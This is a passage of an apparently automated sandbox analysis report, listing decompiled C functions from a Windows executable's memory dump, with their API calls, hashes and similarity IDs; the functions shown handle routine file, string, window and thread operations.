                                                                            									_push(_a28);
                                                                            									_push(_a24);
                                                                            								} else {
                                                                            									_push(0);
                                                                            									_push(0);
                                                                            								}
                                                                            								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
                                                                            								__eflags = _t104;
                                                                            								if(_t104 != 0) {
                                                                            									E001B980D(_t100);
                                                                            									goto L37;
                                                                            								} else {
                                                                            									goto L35;
                                                                            								}
                                                                            							}
                                                                            							_t89 = _t95 + 8;
                                                                            							__eflags = _t95 - _t89;
                                                                            							asm("sbb eax, eax");
                                                                            							_t65 = _t59 & _t89;
                                                                            							_t86 = _t95 + 8;
                                                                            							__eflags = _t65 - 0x400;
                                                                            							if(_t65 > 0x400) {
                                                                            								__eflags = _t95 - _t86;
                                                                            								asm("sbb eax, eax");
                                                                            								_t100 = E001B7A8A(_t86, _t65 & _t86);
                                                                            								_pop(_t86);
                                                                            								__eflags = _t100;
                                                                            								if(_t100 == 0) {
                                                                            									goto L35;
                                                                            								}
                                                                            								 *_t100 = 0xdddd;
                                                                            								L28:
                                                                            								_t100 =  &(_t100[4]);
                                                                            								goto L30;
                                                                            							}
                                                                            							__eflags = _t95 - _t86;
                                                                            							asm("sbb eax, eax");
                                                                            							E001C0EE0();
                                                                            							_t100 = _t106;
                                                                            							__eflags = _t100;
                                                                            							if(_t100 == 0) {
                                                                            								goto L35;
                                                                            							}
                                                                            							 *_t100 = 0xcccc;
                                                                            							goto L28;
                                                                            						}
                                                                            						_t69 = _a28;
                                                                            						if(_t69 == 0) {
                                                                            							goto L37;
                                                                            						}
                                                                            						_t124 = _t104 - _t69;
                                                                            						if(_t104 > _t69) {
                                                                            							goto L36;
                                                                            						}
                                                                            						_t104 = E001B9C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
                                                                            						if(_t104 != 0) {
                                                                            							goto L37;
                                                                            						}
                                                                            						goto L36;
                                                                            					}
                                                                            					asm("sbb eax, eax");
                                                                            					_t71 = _t54 & _t94 + 0x00000008;
                                                                            					_t84 = _t94 + 8;
                                                                            					if((_t54 & _t94 + 0x00000008) > 0x400) {
                                                                            						__eflags = _t94 - _t84;
                                                                            						asm("sbb eax, eax");
                                                                            						_t80 = E001B7A8A(_t84, _t71 & _t84);
                                                                            						_pop(_t84);
                                                                            						__eflags = _t80;
                                                                            						if(__eflags == 0) {
                                                                            							goto L36;
                                                                            						}
                                                                            						 *_t80 = 0xdddd;
                                                                            						L12:
                                                                            						_t80 =  &(_t80[4]);
                                                                            						goto L14;
                                                                            					}
                                                                            					asm("sbb eax, eax");
                                                                            					E001C0EE0();
                                                                            					_t80 = _t106;
                                                                            					if(_t80 == 0) {
                                                                            						goto L36;
                                                                            					}
                                                                            					 *_t80 = 0xcccc;
                                                                            					goto L12;
                                                                            				}
                                                                            			}



























                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001B451B,001B451B,?,?,?,001B97F6,00000001,00000001,31E85006), ref: 001B95FF
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001B97F6,00000001,00000001,31E85006,?,?,?), ref: 001B9685
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001B977F
                                                                            • __freea.LIBCMT ref: 001B978C
                                                                              • Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC
                                                                            • __freea.LIBCMT ref: 001B9795
                                                                            • __freea.LIBCMT ref: 001B97BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1414292761-0
                                                                            • Opcode ID: 113489a8ca3cdd11b5cfc419c63e3c895213f6294f761747e90e0407e5d63c01
                                                                            • Instruction ID: c23c45108d7f6c6bd657abe7143fdb268d9c52a13ee19b72a5381d5538af66b5
                                                                            • Opcode Fuzzy Hash: 113489a8ca3cdd11b5cfc419c63e3c895213f6294f761747e90e0407e5d63c01
                                                                            • Instruction Fuzzy Hash: 9A519172620216ABDB259F64CC81EEF7BEAEB54750F254629FE05D7140EF34DC42CAA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00199768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
                                                                            				long _v0;
                                                                            				void* _t48;
                                                                            				long _t59;
                                                                            				unsigned int _t61;
                                                                            				long _t64;
                                                                            				signed int _t65;
                                                                            				char _t68;
                                                                            				void* _t72;
                                                                            				void* _t74;
                                                                            				long _t78;
                                                                            				void* _t81;
                                                                            
                                                                            				_t74 = __esi;
                                                                            				E001AD940();
                                                                            				_t61 = _a4188;
                                                                            				_t72 = __ecx;
                                                                            				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
                                                                            				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
                                                                            					_t68 = 1;
                                                                            				} else {
                                                                            					_t68 = 0;
                                                                            				}
                                                                            				_push(_t74);
                                                                            				asm("sbb esi, esi");
                                                                            				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
                                                                            				if((_t61 & 0x00000001) != 0) {
                                                                            					_t78 = _t78 | 0x40000000;
                                                                            				}
                                                                            				_t64 =  !(_t61 >> 3) & 0x00000001;
                                                                            				if(_t68 != 0) {
                                                                            					_t64 = _t64 | 0x00000002;
                                                                            				}
                                                                            				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                            				E00196EF9( &_a12);
                                                                            				if( *((char*)(_t72 + 0x1c)) != 0) {
                                                                            					_t78 = _t78 | 0x00000100;
                                                                            				}
                                                                            				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
                                                                            				_t81 = _t48;
                                                                            				if(_t81 != 0xffffffff) {
                                                                            					L17:
                                                                            					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
                                                                            						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
                                                                            						_a8 = _a8 | 0xffffffff;
                                                                            						SetFileTime(_t81, 0,  &_a4, 0);
                                                                            					}
                                                                            					 *((char*)(_t72 + 0x12)) = 0;
                                                                            					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
                                                                            					 *((intOrPtr*)(_t72 + 0xc)) = 0;
                                                                            					 *((char*)(_t72 + 0x10)) = 0;
                                                                            					if(_t81 != 0xffffffff) {
                                                                            						 *(_t72 + 4) = _t81;
                                                                            						E0019FAB1(_t72 + 0x1e, _a4184, 0x800);
                                                                            					}
                                                                            					return _t65;
                                                                            				} else {
                                                                            					_a4.dwLowDateTime = GetLastError();
                                                                            					if(E0019B32C(_a4184,  &_a12, 0x800) == 0) {
                                                                            						L15:
                                                                            						if(_a4.dwLowDateTime == 2) {
                                                                            							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
                                                                            						}
                                                                            						goto L17;
                                                                            					}
                                                                            					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
                                                                            					_t59 = GetLastError();
                                                                            					if(_t59 == 2) {
                                                                            						_a4.dwLowDateTime = _t59;
                                                                            					}
                                                                            					if(_t81 != 0xffffffff) {
                                                                            						goto L17;
                                                                            					} else {
                                                                            						goto L15;
                                                                            					}
                                                                            				}
                                                                            			}















                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001976F2,?,00000005,?,00000011), ref: 00199804
                                                                            • GetLastError.KERNEL32(?,?,001976F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00199811
                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,001976F2,?,00000005,?), ref: 00199846
                                                                            • GetLastError.KERNEL32(?,?,001976F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0019984E
                                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001976F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00199893
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$CreateErrorLast$Time
                                                                            • String ID:
                                                                            • API String ID: 1999340476-0
                                                                            • Opcode ID: 97f64d71f7521e2bbf112ec28858e9d73b508ec07e58829cc902b660abb3b6a9
                                                                            • Instruction ID: 77f8f79f4c537ade51f309b4838524ffaf4321eaa49d2ff2c9911d9c64015147
                                                                            • Opcode Fuzzy Hash: 97f64d71f7521e2bbf112ec28858e9d73b508ec07e58829cc902b660abb3b6a9
                                                                            • Instruction Fuzzy Hash: A241367184474A6BEB209F68DC05BDABBE4FB02324F10071EF9E0961D0D7B5A999CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AA388() {
                                                                            				struct tagMSG _v32;
                                                                            				int _t7;
                                                                            				struct HWND__* _t10;
                                                                            				long _t14;
                                                                            
                                                                            				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
                                                                            				if(_t7 != 0) {
                                                                            					GetMessageW( &_v32, 0, 0, 0);
                                                                            					_t10 =  *0x1d75c8; // 0x19004a
                                                                            					if(_t10 == 0) {
                                                                            						L3:
                                                                            						TranslateMessage( &_v32);
                                                                            						_t14 = DispatchMessageW( &_v32); // executed
                                                                            						return _t14;
                                                                            					}
                                                                            					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
                                                                            					if(_t7 == 0) {
                                                                            						goto L3;
                                                                            					}
                                                                            				}
                                                                            				return _t7;
                                                                            			}








                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001AA399
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001AA3AA
                                                                            • IsDialogMessageW.USER32(0019004A,?), ref: 001AA3BE
                                                                            • TranslateMessage.USER32(?), ref: 001AA3CC
                                                                            • DispatchMessageW.USER32(?), ref: 001AA3D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                            • String ID:
                                                                            • API String ID: 1266772231-0
                                                                            • Opcode ID: 87a4ea0adec95007228fac700115d0c25295df5a50d910b1f02d4762dcc5317a
                                                                            • Instruction ID: 530964a953b45ba0890b64561805d63cef01f83ae14465470625b368f67d71f9
                                                                            • Opcode Fuzzy Hash: 87a4ea0adec95007228fac700115d0c25295df5a50d910b1f02d4762dcc5317a
                                                                            • Instruction Fuzzy Hash: 62F0BD71901229AB8B209BF6BC4CDEB7F6CFF062517804529B50AD2450E764D546C7E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001A9A32(long _a4) {
                                                                            				short _v164;
                                                                            				long _t5;
                                                                            				long _t6;
                                                                            				WCHAR* _t9;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a4;
                                                                            				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
                                                                            				if(_t5 != 0) {
                                                                            					_t9 = L"EDIT";
                                                                            					_t5 = E001A1410( &_v164, _t9);
                                                                            					if(_t5 != 0) {
                                                                            						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
                                                                            						_t11 = _t5;
                                                                            					}
                                                                            				}
                                                                            				if(_t11 != 0) {
                                                                            					_t6 = SHAutoComplete(_t11, 0x10); // executed
                                                                            					return _t6;
                                                                            				}
                                                                            				return _t5;
                                                                            			}









                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 001A9A49
                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 001A9A80
                                                                              • Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426
                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001A9A70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                            • String ID: EDIT
                                                                            • API String ID: 4243998846-3080729518
                                                                            • Opcode ID: 0816e3a2623cdbc574dd3d6d8bc370507bb459ceb06a5bf5d3a096717f9ad64c
                                                                            • Instruction ID: da3166d900385786c18051bc76db4a460d312a6151a62c4e37d5ab33a89a8846
                                                                            • Opcode Fuzzy Hash: 0816e3a2623cdbc574dd3d6d8bc370507bb459ceb06a5bf5d3a096717f9ad64c
                                                                            • Instruction Fuzzy Hash: 70F08236A412287BD7309665AC06FEBBB6CAB87B51F44016ABE01E71C0D760D98386F5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 25%
                                                                            			E001A9AA0(intOrPtr* __ecx) {
                                                                            				char _v8;
                                                                            				intOrPtr _v12;
                                                                            				char _v16;
                                                                            				intOrPtr _v20;
                                                                            				intOrPtr _v24;
                                                                            				intOrPtr _v28;
                                                                            				char _v32;
                                                                            				intOrPtr _t10;
                                                                            
                                                                            				_t10 = E0019FCFD(L"riched20.dll"); // executed
                                                                            				 *__ecx = _t10;
                                                                            				 *0x1cdffc(0); // executed
                                                                            				_v16 = 8;
                                                                            				_v12 = 0x7ff;
                                                                            				 *0x1cdeb4( &_v16); // executed
                                                                            				_v32 = 1;
                                                                            				_v28 = 0;
                                                                            				_v24 = 0;
                                                                            				_v20 = 0;
                                                                            				L001AD820(); // executed
                                                                            				 *0x1cdf08(0x1d75c0,  &_v8,  &_v32, 0); // executed
                                                                            				return __ecx;
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 0019FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
                                                                              • Part of subcall function 0019FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A
                                                                            • OleInitialize.OLE32(00000000), ref: 001A9AB9
                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001A9AF0
                                                                            • SHGetMalloc.SHELL32(001D75C0), ref: 001A9AFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                            • String ID: riched20.dll
                                                                            • API String ID: 3498096277-3360196438
                                                                            • Opcode ID: a3b499f24636e2921e98b996ead55d52a59a6bdddb272909ab5a1cefdbd89f27
                                                                            • Instruction ID: f46f8241a2c4d168589792bb3963c100d8be499539a2bf9a4331ee96c0f93f16
                                                                            • Opcode Fuzzy Hash: a3b499f24636e2921e98b996ead55d52a59a6bdddb272909ab5a1cefdbd89f27
                                                                            • Instruction Fuzzy Hash: 0CF0F9B5D0020DABCB10AF99E849EEEFFFCEF94711F00416AE815E2240DBB456458BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            			E0019964A(void* __ecx, void* _a4, long _a8) {
                                                                            				long _v8;
                                                                            				int _t14;
                                                                            				signed int _t15;
                                                                            				void* _t25;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t25 = __ecx;
                                                                            				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                            					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
                                                                            				}
                                                                            				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                            				if(_t14 != 0) {
                                                                            					_t15 = _v8;
                                                                            				} else {
                                                                            					_t16 = E00199745(_t25);
                                                                            					if(_t16 == 0) {
                                                                            						L7:
                                                                            						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
                                                                            							L10:
                                                                            							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
                                                                            								L14:
                                                                            								_t15 = _t16 | 0xffffffff;
                                                                            							} else {
                                                                            								_t16 = GetLastError();
                                                                            								if(_t16 != 0x21) {
                                                                            									goto L14;
                                                                            								} else {
                                                                            									_push(0x8000);
                                                                            									goto L6;
                                                                            								}
                                                                            							}
                                                                            						} else {
                                                                            							_t16 = GetLastError();
                                                                            							if(_t16 != 0x6d) {
                                                                            								goto L10;
                                                                            							} else {
                                                                            								_t15 = 0;
                                                                            							}
                                                                            						}
                                                                            					} else {
                                                                            						_t16 = 0x4e20;
                                                                            						if(_a8 <= 0x4e20) {
                                                                            							goto L7;
                                                                            						} else {
                                                                            							_push(0x4e20);
                                                                            							L6:
                                                                            							_push(_a4);
                                                                            							_t15 = E0019964A(_t25);
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t15;
                                                                            			}








                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0019965A
                                                                            • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00199672
                                                                            • GetLastError.KERNEL32 ref: 001996A4
                                                                            • GetLastError.KERNEL32 ref: 001996C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorLast$FileHandleRead
                                                                            • String ID:
                                                                            • API String ID: 2244327787-0
                                                                            • Opcode ID: 5de2e6afdff7367b1f07dbc77ec55c9083098d3a63de08d2c1bc8e0c95a5e1a1
                                                                            • Instruction ID: 14b7f90c6dff777ac63cc7d277c2ed7f24777874471aa8219635979e8ff7df14
                                                                            • Opcode Fuzzy Hash: 5de2e6afdff7367b1f07dbc77ec55c9083098d3a63de08d2c1bc8e0c95a5e1a1
                                                                            • Instruction Fuzzy Hash: BB118E30504208EFDF245B68CD44EA97BADEB15321F10C52EF82A85190DB74CD90DF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E001B9A2C(signed int _a4) {
                                                                            				signed int _t9;
                                                                            				void* _t10;
                                                                            				void* _t13;
                                                                            				signed int _t15;
                                                                            				WCHAR* _t22;
                                                                            				signed int _t24;
                                                                            				signed int* _t25;
                                                                            				void* _t27;
                                                                            
                                                                            				_t9 = _a4;
                                                                            				_t25 = 0x1f0768 + _t9 * 4;
                                                                            				_t24 =  *_t25;
                                                                            				if(_t24 == 0) {
                                                                            					_t22 =  *(0x1c5ba0 + _t9 * 4);
                                                                            					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
                                                                            					_t27 = _t10;
                                                                            					if(_t27 != 0) {
                                                                            						L8:
                                                                            						 *_t25 = _t27;
                                                                            						if( *_t25 != 0) {
                                                                            							FreeLibrary(_t27);
                                                                            						}
                                                                            						_t13 = _t27;
                                                                            						L11:
                                                                            						return _t13;
                                                                            					}
                                                                            					_t15 = GetLastError();
                                                                            					if(_t15 != 0x57) {
                                                                            						_t27 = 0;
                                                                            					} else {
                                                                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                            						_t27 = _t15;
                                                                            					}
                                                                            					if(_t27 != 0) {
                                                                            						goto L8;
                                                                            					} else {
                                                                            						 *_t25 = _t15 | 0xffffffff;
                                                                            						_t13 = 0;
                                                                            						goto L11;
                                                                            					}
                                                                            				}
                                                                            				_t4 = _t24 + 1; // 0x44aa1788
                                                                            				asm("sbb eax, eax");
                                                                            				return  ~_t4 & _t24;
                                                                            			}











                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,001B2E0F,00000000,00000000,?,001B99D3,001B2E0F,00000000,00000000,00000000,?,001B9BD0,00000006,FlsSetValue), ref: 001B9A5E
                                                                            • GetLastError.KERNEL32(?,001B99D3,001B2E0F,00000000,00000000,00000000,?,001B9BD0,00000006,FlsSetValue,001C6058,001C6060,00000000,00000364,?,001B85E8), ref: 001B9A6A
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001B99D3,001B2E0F,00000000,00000000,00000000,?,001B9BD0,00000006,FlsSetValue,001C6058,001C6060,00000000), ref: 001B9A78
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: e82b10e17d72dd81b2ee866a414cddd1df11a1bce8fc8f379966baf9e9062986
                                                                            • Instruction ID: e2f2ce78d5bffd9f59c88d536e619f932bceda75d3b5cafaaaa011b2cffdc72b
                                                                            • Opcode Fuzzy Hash: e82b10e17d72dd81b2ee866a414cddd1df11a1bce8fc8f379966baf9e9062986
                                                                            • Instruction Fuzzy Hash: C101F236241222ABC7218A789C48EA67F9CBF45BA17210221FA06D7640D730EC42C6E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
                                                                            			E001A04F5() {
                                                                            				long _v4;
                                                                            				void* __ecx;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				void* _t5;
                                                                            				void* _t7;
                                                                            				int _t8;
                                                                            				void* _t12;
                                                                            				void** _t18;
                                                                            				void* _t22;
                                                                            
                                                                            				_t12 = 0;
                                                                            				if( *0x1d00e0 > 0) {
                                                                            					_t18 = 0x1d00e4;
                                                                            					do {
                                                                            						_t7 = CreateThread(0, 0x10000, E001A062F, 0x1d00e0, 0,  &_v4); // executed
                                                                            						_t22 = _t7;
                                                                            						if(_t22 == 0) {
                                                                            							_push(L"CreateThread failed");
                                                                            							_push(0x1d00e0);
                                                                            							E00196CC9(E001AE214(E00196CCE(0x1d00e0)), 0x1d00e0, 0x1d00e0, 2);
                                                                            						}
                                                                            						 *_t18 = _t22;
                                                                            						 *0x001D01E4 =  *((intOrPtr*)(0x1d01e4)) + 1;
                                                                            						_t8 =  *0x1d7368; // 0x0
                                                                            						if(_t8 != 0) {
                                                                            							_t8 = SetThreadPriority( *_t18, _t8);
                                                                            						}
                                                                            						_t12 = _t12 + 1;
                                                                            						_t18 =  &(_t18[1]);
                                                                            					} while (_t12 <  *0x1d00e0);
                                                                            					return _t8;
                                                                            				}
                                                                            				return _t5;
                                                                            			}













                                                                            APIs
                                                                            • CreateThread.KERNELBASE ref: 001A0519
                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 001A0560
                                                                              • Part of subcall function 00196CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00196CEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                            • String ID: CreateThread failed
                                                                            • API String ID: 2655393344-3849766595
                                                                            • Opcode ID: 68e303e3b2c01b6edebc1c4b46db45e83c7c314668177f2bfff338769194f657
                                                                            • Instruction ID: 82352e2501393adec09a527a831bae96831c444ba5e434d1c0a83ea3d2824f57
                                                                            • Opcode Fuzzy Hash: 68e303e3b2c01b6edebc1c4b46db45e83c7c314668177f2bfff338769194f657
                                                                            • Instruction Fuzzy Hash: 5401F9B57443057FD7256F509C41F6A77A8EB5E751F10042FF685622C1CBB1AC84CA30
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                            			E00199C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
                                                                            				void* __ebp;
                                                                            				int _t24;
                                                                            				long _t32;
                                                                            				void* _t36;
                                                                            				void* _t42;
                                                                            				void* _t52;
                                                                            				intOrPtr* _t53;
                                                                            				void* _t57;
                                                                            				intOrPtr _t58;
                                                                            				long _t59;
                                                                            
                                                                            				_t52 = __edx;
                                                                            				_t59 = _a8;
                                                                            				_t53 = __ecx;
                                                                            				if(_t59 != 0) {
                                                                            					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                            						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
                                                                            					}
                                                                            					while(1) {
                                                                            						_a8 = _a8 & 0x00000000;
                                                                            						_t42 = 0;
                                                                            						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
                                                                            							goto L12;
                                                                            						}
                                                                            						_t57 = 0;
                                                                            						if(_t59 == 0) {
                                                                            							L14:
                                                                            							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
                                                                            								L21:
                                                                            								 *((char*)(_t53 + 8)) = 1;
                                                                            								return _t42;
                                                                            							} else {
                                                                            								_t56 = _t53 + 0x1e;
